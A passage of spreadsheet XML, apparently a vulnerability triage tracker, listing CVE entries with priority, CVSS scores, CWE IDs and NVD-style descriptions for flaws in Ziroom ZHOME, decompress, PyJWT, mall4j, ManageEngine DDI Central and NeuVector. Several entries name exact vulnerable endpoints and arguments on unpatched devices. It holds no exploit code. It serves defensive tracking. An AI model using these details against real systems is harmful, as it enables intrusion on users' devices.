      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Ziroom ZHOME A0101 1.0.1.0. This affects an unknown part of the file /api/ZRnetwork/firstSetup_wifi. Executing a manipulation of the argument login_pwd can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101261</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101262</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0. This vulnerability affects unknown code of the file /api/ZRQos/set_online_client. The manipulation of the argument ip leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101262</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101263</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ziroom ZHOME A0101 1.0.1.0. This issue affects some unknown processing of the file /api/ZRQos/set_online_client. The manipulation of the argument mac results in command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101263</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101264</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Ziroom ZHOME A0101 1.0.1.0. Impacted is an unknown function of the file /api/ZRnetwork/set_passwd. This manipulation of the argument password1 causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101264</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>The decompress package for Node.js extracts archives. Prior to 10.2.2 and 11.1.4, the default decompress(input, output) API relies on lexical containment checks that do not account for the kernel following a planted symlink chain. An attacker can supply a crafted archive containing chained symlink entries so that a later entry resolves outside the output directory. This allows files outside output to be read or written, and overwriting startup scripts or configuration can lead to remote code execution. The maintained @xhmikosr/decompress package is fixed in 10.2.2 and 11.1.4, but the separately affected unmaintained decompress package remains unpatched through 4.2.1. This vulnerability results from a bypass of the incomplete hardening for CVE-2026-53486. @xhmikosr/decompress is fixed in versions 10.2.2 and 11.1.4.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, is_pem_format in jwt/utils.py is affected because is_pem_format does not recognize every PEM representation accepted by the cryptography loader. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a mutated public-key PEM as raw key bytes. As a result, HMACAlgorithm.prepare_key treats the unrecognized asymmetric public key as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102361</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains a missing authentication vulnerability in the PUT /user/updatePwd endpoint that allows unauthenticated attackers to reset any storefront account password. Attackers can supply a target username in the request body to overwrite passwords without verification, enabling account takeover and access to orders and personal data.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102361</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49994</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Bluehood monitors local bluetooth activity. Prior to version 0.7.1, when auth_enabled is set in Bluehood, only the HTML page handlers enforced session validation. The /api/* handlers (settings, devices, groups, per-device endpoints including /api/device/{mac}/notes) called no auth check at all. A network attacker reachable on the dashboard port could read Bluetooth tracking data and modify application state — including the heartbeat URL, prune retention, device groups, and per-device notes — without a session cookie. This issue has been patched in version 0.7.1.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49994</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82378</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization in the OAuth 1.0a authorization endpoint of Apache Roller 6.1.5 allows an unauthenticated remote attacker who learns an outstanding request token for a configured site-wide consumer to bind that token to an arbitrary user account, including an administrator, by submitting an unsigned authorization request. The endpoint derives the authorizing identity from a request-supplied value rather than the authenticated session. Only installations that configure an OAuth 1.0a site-wide consumer are affected, and exploitation requires knowledge of one of its outstanding request tokens. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which binds authorization to the logged-in session.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82378</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101074</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Netcore NR289-GE 1.4.5102. The affected element is the function password-check of the file /bin/boa of the component Authentication. Executing a manipulation of the argument Username can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101074</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101860</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in RaspAP raspap-webgui up to 3.5.5. Affected by this issue is the function PluginInstaller::addSudoers of the file src/RaspAP/Plugins/PluginInstaller.php of the component sudo Configuration. Performing a manipulation results in improper privilege management. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101860</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12264</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Arbitrary file write via HA Failover Config sync upload leading to remote code execution.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12264</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12265</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>postgresql, gin</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Insufficient access control in HA failover endpoint leading to destructive PostgreSQL database operations.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12265</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12268</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to PowerShell command injection in Windows DNS SPF/TXT record push leading to remote code execution.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12268</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12269</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-434</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central 6.2.0 build below 6201 had a Keepalived configuration injection vulnerability in the HA configuration workflow. This issue could allow an authenticated operator-level user to modify the Keepalived configuration and potentially execute commands as root on the DDI Central host.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12269</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78424</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper parameter handling in NeuVector allows any authenticated user who holds the namespaced Runtime Policies (write) permission or anyone with access to NeuVector’s internal gRPC certificate key pair the ability to inject OS commands in the privileged enforcer container, which can lead to the complete compromise of the worker node. This affects NeuVector 5.4 before 5.4.11, NeuVector 5.5 before 5.5.4, NeuVector 5.6 before 5.6.2 and potentially older versions.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
